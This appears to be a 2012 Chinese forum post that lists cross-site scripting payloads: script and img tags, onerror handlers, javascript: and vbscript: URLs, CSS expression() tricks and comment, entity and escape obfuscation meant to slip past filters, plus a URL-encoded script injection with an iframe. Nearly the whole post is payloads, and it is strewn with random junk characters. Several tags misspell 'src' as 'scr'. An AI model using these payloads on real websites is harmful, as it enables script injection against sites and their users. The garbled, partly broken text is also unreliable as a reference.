<script>alert("跨站")</script> (最常用)( @+ d2 K1 C1 h1 C8 o
<img scr=javascript:alert("跨站")></img>
, M/ A: v+ O, o/ J<img scr="javascript: alert(/跨站/)></img>& X- S) S2 V; t( f
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)3 i) c3 W9 \ q+ u& D- ^4 J; ^) `9 M
<img scr="#" onerror=alert(/跨站/)></img>3 u' b T/ A" @' }1 q$ v- S
<img scr="#" style="xss:expression(alert(/xss/));"></img>8 N7 L; h! b2 O: i
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)+ [2 C% v* U7 n7 z6 g
<img src=vbscript:msgbox ("xss")></img>
' |) }* O8 ?4 u" F; @& J* L9 C<style> input {left:expression (alert('xss'))}</style>
9 g- x `4 D9 a/ ^<div style={left:expression (alert('xss'))}></div>) t3 B. [& J Q9 |
<div style={left:exp/* */ression (alert('xss'))}></div>( K* y5 [( V6 u& f( Q! K( @ R
<div style={left:\0065\0078ression (alert('xss'))}></div>6 w- S. U8 C1 M) S: O5 Y0 q
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>) s( g3 I# P5 U( b N) I
unicode <div style="{left:expRessioN (alert('xss'))}">; U$ e4 i# S8 d% a
* W) W6 K; B: c) J4 ?1 }- u+ W8 r"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
# R" i) g, P$ u% J |
发表于 2012-9-15 14:09:13
收藏
支持
反对